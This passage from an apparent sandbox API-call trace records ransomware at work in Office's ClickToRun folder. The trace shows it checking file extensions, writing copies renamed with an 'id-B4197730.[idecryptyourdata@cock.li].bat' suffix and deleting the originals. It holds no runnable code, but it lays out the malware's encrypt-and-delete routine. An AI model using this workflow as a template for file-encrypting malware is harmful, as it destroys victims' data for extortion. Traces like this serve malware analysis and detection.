(lpString1=".ppt", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.740] lstrlenW (lpString=".zip") returned 4 [0178.740] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString=".rar") returned 4 [0178.740] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString=".bz2") returned 4 [0178.740] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.740] lstrlenW (lpString=".7z") returned 3 [0178.740] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.740] lstrlenW (lpString=".dbf") returned 4 [0178.740] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.741] lstrlenW (lpString=".1cd") returned 4 [0178.741] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.741] lstrlenW (lpString=".jpg") returned 4 [0178.741] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.741] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.741] lstrlenW (lpString="api-ms-win-crt-stdio-l1-1-0.dll") returned 31 [0178.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.742] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=24768) returned 1 [0178.742] CloseHandle (hObject=0x358) returned 1 [0178.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x20 [0178.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.742] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.742] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0178.743] GetLastError () returned 0x0 [0178.743] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x60c0, lpOverlapped=0x0) returned 1 [0178.752] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x60d0, lpOverlapped=0x0) returned 1 [0178.753] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0178.753] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x112, lpOverlapped=0x0) returned 1 [0178.754] SetEndOfFile (hFile=0x35c) returned 1 [0178.754] CloseHandle (hObject=0x35c) returned 1 [0178.754] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.754] SetEndOfFile (hFile=0x358) returned 1 [0178.755] CloseHandle (hObject=0x358) returned 1 [0178.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.755] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 1 [0178.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.756] lstrlenW (lpString=".doc") returned 4 [0178.756] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.756] lstrlenW (lpString=".docx") returned 5 [0178.756] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.756] lstrlenW (lpString=".pdf") returned 4 [0178.756] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.756] lstrlenW (lpString=".xls") returned 4 [0178.756] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.756] lstrlenW (lpString=".xlsx") returned 5 [0178.756] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.756] lstrlenW (lpString=".ppt") returned 4 [0178.756] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.756] lstrlenW (lpString=".zip") returned 4 [0178.756] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.756] lstrlenW (lpString=".rar") returned 4 [0178.756] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.757] lstrlenW (lpString=".bz2") returned 4 [0178.757] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.757] lstrlenW (lpString=".7z") returned 3 [0178.757] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.757] lstrlenW (lpString=".dbf") returned 4 [0178.757] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.757] lstrlenW (lpString=".1cd") returned 4 [0178.757] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.757] lstrlenW (lpString=".jpg") returned 4 [0178.757] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.757] lstrlenW (lpString=".doc") returned 4 [0178.757] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.757] lstrlenW (lpString=".docx") returned 5 [0178.757] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.757] lstrlenW (lpString=".pdf") returned 4 [0178.757] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.757] lstrlenW (lpString=".xls") returned 4 [0178.757] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.757] lstrlenW (lpString=".xlsx") returned 5 [0178.757] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.758] lstrlenW (lpString=".ppt") returned 4 [0178.758] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.758] lstrlenW (lpString=".zip") returned 4 [0178.758] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.758] lstrlenW (lpString=".rar") returned 4 [0178.758] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.758] lstrlenW (lpString=".bz2") returned 4 [0178.758] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.758] lstrlenW (lpString=".7z") returned 3 [0178.758] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.758] lstrlenW (lpString=".dbf") returned 4 [0178.758] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.758] lstrlenW (lpString=".1cd") returned 4 [0178.758] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 89 [0178.758] lstrlenW (lpString=".jpg") returned 4 [0178.758] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.759] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.759] lstrlenW (lpString="api-ms-win-crt-string-l1-1-0.dll") returned 32 [0178.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.759] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=24768) returned 1 [0178.759] CloseHandle (hObject=0x358) returned 1 [0178.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x20 [0178.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.760] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.760] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0178.760] GetLastError () returned 0x0 [0178.760] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x60c0, lpOverlapped=0x0) returned 1 [0179.231] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x60d0, lpOverlapped=0x0) returned 1 [0179.233] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.233] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x114, lpOverlapped=0x0) returned 1 [0179.233] SetEndOfFile (hFile=0x35c) returned 1 [0179.233] CloseHandle (hObject=0x35c) returned 1 [0179.233] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.234] SetEndOfFile (hFile=0x358) returned 1 [0179.234] CloseHandle (hObject=0x358) returned 1 [0179.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.235] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 1 [0179.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.235] lstrlenW (lpString=".doc") returned 4 [0179.235] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.235] lstrlenW (lpString=".docx") returned 5 [0179.235] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0179.235] lstrlenW (lpString=".pdf") returned 4 [0179.235] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.235] lstrlenW (lpString=".xls") returned 4 [0179.235] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.235] lstrlenW (lpString=".xlsx") returned 5 [0179.235] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0179.236] lstrlenW (lpString=".ppt") returned 4 [0179.236] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.236] lstrlenW (lpString=".zip") returned 4 [0179.236] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.236] lstrlenW (lpString=".rar") returned 4 [0179.236] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.236] lstrlenW (lpString=".bz2") returned 4 [0179.236] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.236] lstrlenW (lpString=".7z") returned 3 [0179.236] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.236] lstrlenW (lpString=".dbf") returned 4 [0179.236] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.236] lstrlenW (lpString=".1cd") returned 4 [0179.236] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.237] lstrlenW (lpString=".jpg") returned 4 [0179.237] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.237] lstrlenW (lpString=".doc") returned 4 [0179.237] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString=".docx") returned 5 [0179.237] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0179.237] lstrlenW (lpString=".pdf") returned 4 [0179.237] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString=".xls") returned 4 [0179.237] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString=".xlsx") returned 5 [0179.237] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0179.237] lstrlenW (lpString=".ppt") returned 4 [0179.237] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.237] lstrlenW (lpString=".zip") returned 4 [0179.237] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString=".rar") returned 4 [0179.237] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.237] lstrlenW (lpString=".bz2") returned 4 [0179.237] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.237] lstrlenW (lpString=".7z") returned 3 [0179.237] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.238] lstrlenW (lpString=".dbf") returned 4 [0179.238] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.238] lstrlenW (lpString=".1cd") returned 4 [0179.238] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 90 [0179.238] lstrlenW (lpString=".jpg") returned 4 [0179.238] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.238] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.238] lstrlenW (lpString="AppvIsvSubsystems64.dll") returned 23 [0179.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.238] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=2285736) returned 1 [0179.239] CloseHandle (hObject=0x358) returned 1 [0179.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")) returned 0x20 [0179.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0179.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")) returned 1 [0179.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.243] lstrlenW (lpString=".doc") returned 4 [0179.243] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.243] lstrlenW (lpString=".docx") returned 5 [0179.243] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0179.243] lstrlenW (lpString=".pdf") returned 4 [0179.243] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.243] lstrlenW (lpString=".xls") returned 4 [0179.243] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.243] lstrlenW (lpString=".xlsx") returned 5 [0179.243] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0179.243] lstrlenW (lpString=".ppt") returned 4 [0179.243] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.243] lstrlenW (lpString=".zip") returned 4 [0179.243] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.243] lstrlenW (lpString=".rar") returned 4 [0179.243] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.243] lstrlenW (lpString=".bz2") returned 4 [0179.243] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.243] lstrlenW (lpString=".7z") returned 3 [0179.243] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.243] lstrlenW (lpString=".dbf") returned 4 [0179.243] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.244] lstrlenW (lpString=".1cd") returned 4 [0179.244] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.244] lstrlenW (lpString=".jpg") returned 4 [0179.244] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.244] lstrlenW (lpString=".doc") returned 4 [0179.244] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString=".docx") returned 5 [0179.244] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0179.244] lstrlenW (lpString=".pdf") returned 4 [0179.244] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString=".xls") returned 4 [0179.244] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString=".xlsx") returned 5 [0179.244] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0179.244] lstrlenW (lpString=".ppt") returned 4 [0179.244] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.244] lstrlenW (lpString=".zip") returned 4 [0179.244] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString=".rar") returned 4 [0179.244] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.244] lstrlenW (lpString=".bz2") returned 4 [0179.244] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.244] lstrlenW (lpString=".7z") returned 3 [0179.244] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.245] lstrlenW (lpString=".dbf") returned 4 [0179.245] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.245] lstrlenW (lpString=".1cd") returned 4 [0179.245] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 